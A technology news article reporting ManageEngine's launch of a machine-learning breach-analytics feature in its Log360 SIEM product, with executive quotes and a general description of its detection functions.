IT Brief New Zealand - Technology news for CIOs & IT decision-makers
New Zealand
Guides
#
artificial intelligence
#
digital transformation
#
disaster recovery
#
internet of things
#
work from home
Search
Story image
#
Advanced Persistent Threat Protection
#
ML
#
SIEM
ManageEngine unveils machine learning feature in Log360 for rapid breach response
Fri, 23rd Feb 2024
Author image
By Catherine Knowles, Journalist
Follow us

ManageEngine, the enterprise IT management arm of Zoho Corporation, has announced the release of a machine learning (ML)-powered exploit triad analytics feature in its Security Information and Event Management (SIEM) solution, Log360, to address the growing need for faster breach responses.

This feature unveiled at the ManageEngine User Conference held at The Ritz-Carlton, Dubai International Financial Centre, provides enterprises the capability to trace the path of adversaries and mitigate breaches by providing complete contextual visibility into the exploit triad, namely, users, entities, and processes.

Manikandan Thangaraj, Vice President of ManageEngine, highlighted the alarming statistics centred around data breaches. "Today's cyber threats masterfully blend into the fabric of legitimate activity, weaponising stolen credentials, mimicking trusted processes, and exploiting human vulnerabilities," said Thangaraj. He added, "It takes an alarming 277 days to identify and contain a data breach, with expenses surging by 23% after surpassing the 200-day mark."

Thangaraj believes Log360's ML solution aims to dramatically reduce the breach life cycle. "By offering a dynamic tapestry of insights into user attributes, process lineage, and threat intelligence, Log360's ML-powered exploit triad analytics transcends merely assisting detection to enabling better comprehension. This makes it a game-changer in reducing the breach life cycle," said Thangaraj.

In an enhancement to Log360's threat detection and incident response module, Vigil IQ, it appears they are addressing the multi-faceted nature of cybersecurity threats. The upgrade includes an integrated trifecta featuring user, device, and process analytics - all accessible via a single console. This enhancement makes the software a tool for professionals seeking detailed information whilst undertaking security investigations.

Other additions to Log360 include ML-powered contextual data enrichment and a process hunting suite. The former provides Log360 with a robust contextual analysis system drawing insights from User and Entity Behaviour Analytics (UEBA), process tree visualisation, and the risk scoring of IPs, URLs, and domains. Simultaneously, the process hunting suite creates a complete suite for process hunting combined with the correlation rules for the initiation of suspicious processes.

The updated iteration of Vigil IQ further enhances threat detection capabilities with a correlation package for prevalent attacker tools and live off the land (LOTL) threats, offering more than 100 out-of-the-box correlation rules for effective detection of prevalent attacker tools and LOTL attacks.

An integration with VirusTotal, one of the leading threat intelligence services, further expands the Advanced Threat Analytics feature for enhanced visibility into external threats and risk analysis. This comprehensive approach aims to equip enterprises with the tools they need to navigate an increasingly difficult cybersecurity landscape.

Related stories
Navigating the future of the consulting industry
AI tools linked to data exposure in 1 in 5 UK organisations
Appian & AWS partnership to enhance AI in enterprise processes
Dell, Hyundai AutoEver & Intel collaborate for AI edge ecosystem growth
BeyondTrust's 2024 report reveals top Microsoft vulnerabilities
Top stories
Zscaler introduces enhanced ZDX service for improved IT operations
The importance of cybersecurity training for software developers
HID acknowledged as Leader in Gartner Magic Quadrant for Indoor Location Services
Exclusive: How Darktrace is tackling AI-driven cybersecurity
Dropbox unveils new features for remote work, enhances Microsoft integration